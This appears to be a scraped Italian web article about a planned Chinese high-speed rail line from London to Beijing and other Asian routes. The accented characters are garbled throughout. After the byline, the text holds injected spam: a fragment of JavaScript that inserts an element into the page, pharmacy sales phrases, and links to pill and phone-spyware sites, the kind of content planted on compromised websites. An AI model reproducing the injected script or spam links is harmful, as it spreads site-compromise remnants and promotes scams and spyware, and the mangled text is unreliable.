Da Londra a Pechino in treno

Da Londra a Pechino in treno

La Chinese Academy of Engineering promette nel giro di dieci anni una rete ferroviaria ad alta velocitA� in grado di compiere in due giorni la tratta Londra – Pechino. Si partirA� da King’s Cross, e poi giA? sotto la Manica traversando Europa e Russia, per trovarsi comodamente dopo due giorni a Pechino.

“Puntiamo ad avere dei treni che vadano veloci quasi quanto gli aerei” afferma il consulente per la linea cinese interna ad alta velocitA�, che nel 2009 ha dato il via anche all’Harmony Express, il treno piA? veloce al mondo, che collega in appena tre ore, lungo un percorso di mille Km, le cittA� di Wuhan e Guangzhou, con picchi di velocitA� intorno ai 400 chilometri all’ora.

Il progetto alta- velocitA� della Cina prevede altre ramificazioni all’immenso “cammino di ferro” che si poggerA� in tutta l’Asia, oltre alla tratta verso Londra che comprende anche un collegamento trans-siberiano, dove vivono oltre un milione di cinesi, c’A? in progetto una linea verso India e Pakistan e un’altra verso il Sud-est asiatico, quindi Vietnam, Tailandia, Birmania e Malesia.

Va da sA� che i costi siano esorbitanti, solo per la rete del Sud-est asiatico si parla di 440 milioni di euro, ma nulla A? lasciato al caso, la Cina ha giA� stabilito di poter sfruttare le risorse minerarie di Litio della Birmania, in cambio della costruzione delle linee ferroviarie.

Mario Gravina Cheap purchase ethionamide nad Cheap if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); buy ginseng extract online http://test-sites.ovh/2018/03/19/imitrex-online-canada/ cvs price for prilosec viamedic. com Purchase Buy Pills remeron canada Order kamagra now co uk delivery where to buy cialis in canada, zithromax chlamydia. http://nerolandscape.net/2017/10/kik-spy-iphone-spy-software-iphone-spyware-for-parents/

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>